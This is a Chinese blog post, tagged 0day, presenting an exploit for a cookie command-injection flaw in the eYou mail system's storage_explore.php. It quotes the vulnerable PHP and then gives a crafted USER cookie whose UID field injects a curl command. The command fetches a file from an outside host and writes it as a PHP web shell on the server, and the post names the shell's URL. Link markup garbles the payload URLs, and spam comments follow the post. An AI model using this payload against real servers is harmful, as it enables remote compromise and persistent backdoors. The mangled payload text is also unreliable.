『河马』eyou Storage_explore.php Cookie命令注入漏洞利用工具


文件/user/storage_explort.php
<?php
/**
* 用户网络存储列表
*
* 该页面显示登录邮箱用户的网络存储文件列表,选择后添加到邮件的附件中。
*
* @author FengHui <fenghui@eyou.net>
* @copyright 2008 eYou.net
* @version storage_explore.php 2008/05/19
*/
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');

$skin               = getCookieUserValue('SKIN');
$uid                = getCookieUserValue('UID');
$domain             = getCookieUserValue('DOMAIN');
$user_dir_path      = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path  = $user_dir_path.'/storage/Data/';
$userinfo = get_userinfo($uid , $domain);

// 获取用户允许上传的最大附件大小
$attachsize = (int)($userinfo['attachsize'][0]);

$is_submit = $_POST['is_submit'] ? true : false;
?>
跟进getCookieUserValue函数:

function getCookieUserValue($key) {
    $user_arr = explode('&', cookie('USER'));
    $n = count($user_arr);
    for ($i = 0; $i < $n; $i++) {
        $g_arr = explode('=', $user_arr[$i]);
        if ($g_arr[0] == $key) {
            return $g_arr[1];
        }
    }
    return null;
}

跟进cookie函数:
function cookie($name){
    if (array_key_exists($name, $_COOKIE)) return $_COOKIE[$name];
       return '';

整个过程没有对cookie 进行过滤

直接就取那个cookie中USER的值取出来,然后进入了getUserDirPath函数

来看看getUserDirPath函数:

/**
* 获取用户目录的路径
*
* @param string $uid
* @param string $domain
*/
function getUserDirPath($uid, $domain) {
    $cmd = "/var/eyou/sbin/hashid $uid $domain";
    echo $cmd;
    $path = `$cmd`;
    $path = trim($path);
    return $path;
}

uid和domain直接进入了命令,导致命令执行。



漏洞利用:

将cookie设置为:

USER=UID=1|curl isafe.cc" target="_blank">isafe.cc:8080/test.txt" target="_blank">http://www.isafe.cc" target="_blank">isafe.cc:8080/test.txt>>www.isafe.cc" target="_blank">isafe.cc.php
然后访问localhost/user/storage_explore.php
此时会在localhost/user/下生成www.isafe.cc" target="_blank">isafe.cc.php文件

shell地址为:

localhost/user/www.isafe.cc" target="_blank">isafe.cc.php
只允许会员下载 该文件只允许会员下载! 登录 | 注册

[本日志由 admin 于 2017-10-14 07:51 PM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 0day
评论: 167 | 引用: 0 | 查看次数: 14284
Scott [2015-11-16 02:23 PM]
Hi there, neat online site you've gotten presently.
Kasha [2015-11-12 11:34 PM]
Sustain the awesome work !! Lovin' it!
Philomena [2015-11-11 04:16 AM]
Cool web-site you've going here.
Don [2015-11-09 02:13 PM]
Very good Web page, Carry on the beneficial job. Thanks a lot!
Shanna [2015-11-07 08:15 PM]
Appreciate it! This is definitely an amazing web site!
Milagro [2015-11-06 12:25 AM]
Your knowledge is incredibly useful.
Staci [2015-11-06 09:51 AM]
You're a really useful internet site; couldn't make it without ya!
Margherita [2015-11-02 01:50 PM]
I like this site - its so usefull and helpfull.
Delilah [2015-11-01 09:38 AM]
thank a lot for your internet site it helps a great deal.
Tami [2015-10-24 10:51 PM]
Really such a handy web site.
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码
内 容:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭